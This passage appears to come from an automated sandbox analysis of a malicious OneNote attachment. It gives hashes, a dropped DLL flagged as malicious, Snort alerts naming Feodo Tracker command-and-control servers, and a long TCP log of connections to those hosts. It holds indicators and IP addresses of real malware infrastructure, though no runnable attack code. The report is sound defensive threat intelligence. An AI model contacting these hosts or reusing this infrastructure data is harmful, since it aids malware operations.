MD5:	51917AB11B75BF838A2709329CC1EE1F
SHA1:	70C8ADEC676870BE92FE7298BFDCCFBFE39910C4
SHA-256:	66CB62E5EEB9C58EF237CAA0D6C8DD37317AF9AC44CE6DCECFC19F6F2E847725
SHA-512:	8A845B43B1065FA9818FE9792DD388910ABE662A652507119AD20922355E28AC8F5958273ADF94015207ECE7124D90397057A8980CC6D940B2A983725B905D7C
Malicious:	false
Preview:	L..................F.... ....>-.....Rm...X...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qV.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qV......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qV......].....................u..O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.qV................................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z\|...K.J.........`.......X.......287400...........!a..%.H.VZAj...4.........

C:\Windows\System32\RPJQOdVdSbhDZ\IMSnbfr.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	6.730756805388616
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	iMedPub_LTD_4.one
File size:	120428
MD5:	862cfd3b3523532ba0faad1bcc568c4d
SHA1:	faa8437483dab403f6079be49758407a9d59b964
SHA256:	b7f06ac0c97b87147a07ea1471097d84445faff5d13aebc195abb3fbeaa4e526
SHA512:	0a908cf6316552195abd7a6af171df865e097b1193052625090e4a274ed03a1edbbd7b5e18c55ce43bb06db5a5bcb8fc1b47236bcb22cf8c306bcbdf355ee3f5
SSDEEP:	1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXS:1BoC+tCYvSMVnte8ZP1Y6JC
TLSH:	76C33BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D5DD8EF
File Content Preview:	.R\{...M..Sx.).......i.E......&.................?......I...................................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.7213.239.212.5497384432404320 03/17/23-09:28:02.219302	TCP	2404320	ET CNC Feodo Tracker Reported CnC Server TCP group 11	49738	443	192.168.2.7	213.239.212.5
192.168.2.791.121.146.474970480802404344 03/17/23-09:24:48.781527	TCP	2404344	ET CNC Feodo Tracker Reported CnC Server TCP group 23	49704	8080	192.168.2.7	91.121.146.47
192.168.2.7182.162.143.56497074432404312 03/17/23-09:25:00.477991	TCP	2404312	ET CNC Feodo Tracker Reported CnC Server TCP group 7	49707	443	192.168.2.7	182.162.143.56
192.168.2.766.228.32.314970670802404330 03/17/23-09:24:54.704501	TCP	2404330	ET CNC Feodo Tracker Reported CnC Server TCP group 16	49706	7080	192.168.2.7	66.228.32.31
192.168.2.7167.172.199.1654970980802404308 03/17/23-09:25:12.955315	TCP	2404308	ET CNC Feodo Tracker Reported CnC Server TCP group 5	49709	8080	192.168.2.7	167.172.199.165
192.168.2.7104.168.155.1434971480802404302 03/17/23-09:25:25.962930	TCP	2404302	ET CNC Feodo Tracker Reported CnC Server TCP group 2	49714	8080	192.168.2.7	104.168.155.143
192.168.2.7206.189.28.1994973080802404318 03/17/23-09:26:56.214746	TCP	2404318	ET CNC Feodo Tracker Reported CnC Server TCP group 10	49730	8080	192.168.2.7	206.189.28.199

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:24:04.208671093 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:04.208734989 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:04.208856106 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:04.212713957 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:04.212744951 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:04.785552025 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:04.785907984 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:04.788197041 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:04.788224936 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:04.789057016 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:04.834260941 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.031222105 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.031276941 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.341269970 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.341306925 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.341315985 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.341417074 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.341444016 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.381063938 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.616789103 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.616812944 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.616940975 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.616959095 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617017984 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617038965 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.617050886 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617078066 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617084026 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.617094040 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617110968 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.617127895 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.617157936 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.662308931 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.662359953 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.709239006 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.896198988 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896214008 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896275997 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896292925 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896377087 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.896409035 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896430969 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.896481991 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.896650076 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896665096 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.896773100 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.896790028 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.897280931 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.897367954 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.897386074 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.897494078 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.897573948 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.897591114 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.934438944 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.934648037 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:05.934675932 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:05.974833012 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171289921 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171312094 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171427965 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171447992 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171479940 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171566010 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171593904 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171608925 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171622992 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171637058 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171653032 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171653032 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171660900 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171688080 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171704054 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171724081 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.171737909 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171737909 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.171772003 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.174612045 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174746990 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174789906 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174863100 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.174885035 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174901962 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174911976 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.174946070 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.174971104 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.174988031 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.175013065 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.175030947 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.175088882 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.175100088 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.210366011 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.210602999 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.210632086 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.210664988 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.210777044 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.210796118 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.256135941 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.447298050 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.447475910 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.447498083 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.447537899 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.447551966 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.447592020 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.447784901 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.447856903 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.447869062 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.447959900 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448024035 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448035955 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448282957 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448385954 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448400974 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448421955 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448468924 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448509932 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448565960 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448579073 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448699951 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448760033 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448771954 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448899031 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.448960066 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.448973894 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449049950 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449106932 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449117899 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449130058 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449186087 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449198008 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449240923 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449357033 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449418068 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449428082 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449436903 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449507952 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449522018 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449683905 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449747086 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449757099 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449884892 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449944973 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.449955940 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.449980974 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.450032949 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.450043917 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.450083971 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.450126886 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.451926947 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.451952934 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:06.451982975 CET	49701	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:24:06.451992035 CET	443	49701	203.26.41.131	192.168.2.7
Mar 17, 2023 09:24:48.781527042 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:48.809236050 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:48.809401035 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:48.812890053 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:48.840385914 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:48.861109972 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:48.861196995 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:48.861268044 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:48.866543055 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:48.895138025 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:48.947149992 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:50.425615072 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:50.425616026 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:50.453192949 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:50.935000896 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:50.979058027 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:53.932641029 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:53.932681084 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:53.932751894 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:53.934030056 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:53.934072018 CET	49704	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:24:53.961420059 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:53.961457014 CET	8080	49704	91.121.146.47	192.168.2.7
Mar 17, 2023 09:24:54.704500914 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:54.804821968 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:54.804991007 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:54.816508055 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:54.916651964 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:54.924621105 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:54.924655914 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:54.924809933 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:54.934545994 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:55.035700083 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:55.037241936 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:55.179486036 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:56.555181026 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:56.604051113 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:59.552674055 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:59.552716970 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:59.552885056 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:59.552974939 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:59.553029060 CET	49706	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:24:59.652936935 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:24:59.652981043 CET	7080	49706	66.228.32.31	192.168.2.7
Mar 17, 2023 09:25:00.477991104 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:00.478050947 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:00.478127956 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:00.479094982 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:00.479114056 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:01.220607042 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:01.220738888 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:01.225739002 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:01.225785971 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:01.226349115 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:01.236825943 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:01.236869097 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:02.351079941 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:02.351212978 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:02.351360083 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:02.351716995 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:02.351742983 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:02.351773977 CET	49707	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:25:02.351783037 CET	443	49707	182.162.143.56	192.168.2.7
Mar 17, 2023 09:25:06.969321012 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.197654963 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:07.197843075 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.198616982 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.426733971 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:07.444271088 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:07.444314003 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:07.444518089 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.447803020 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.676604033 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:07.679683924 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:07.947030067 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:08.992017984 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:09.058285952 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:11.990458965 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:11.990504980 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:11.990711927 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:11.990818024 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:11.990885973 CET	49708	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:25:12.219016075 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:12.219053030 CET	80	49708	187.63.160.88	192.168.2.7
Mar 17, 2023 09:25:12.955315113 CET	49709	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:25:13.122450113 CET	8080	49709	167.172.199.165	192.168.2.7
Mar 17, 2023 09:25:13.636694908 CET	49709	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:25:13.803505898 CET	8080	49709	167.172.199.165	192.168.2.7
Mar 17, 2023 09:25:14.308706045 CET	49709	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:25:14.475492001 CET	8080	49709	167.172.199.165	192.168.2.7
Mar 17, 2023 09:25:19.956995964 CET	49710	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.957062960 CET	443	49710	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:19.957308054 CET	49710	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.959697008 CET	49710	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.959750891 CET	443	49710	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:19.992611885 CET	443	49710	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:19.993479967 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.993555069 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:19.993663073 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.994159937 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:19.994190931 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.028563023 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.031090021 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.031177044 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.031403065 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.032126904 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.032166004 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.068548918 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.070128918 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.070171118 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.071121931 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.071851969 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:25:20.071885109 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:20.103910923 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:25:25.962929964 CET	49714	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:25:26.127194881 CET	8080	49714	104.168.155.143	192.168.2.7
Mar 17, 2023 09:25:26.637865067 CET	49714	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:25:26.802145004 CET	8080	49714	104.168.155.143	192.168.2.7
Mar 17, 2023 09:25:27.309977055 CET	49714	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:25:27.474381924 CET	8080	49714	104.168.155.143	192.168.2.7
Mar 17, 2023 09:25:32.968271017 CET	49715	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:25:33.179632902 CET	8080	49715	163.44.196.120	192.168.2.7
Mar 17, 2023 09:25:33.685374975 CET	49715	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:25:33.895565987 CET	8080	49715	163.44.196.120	192.168.2.7
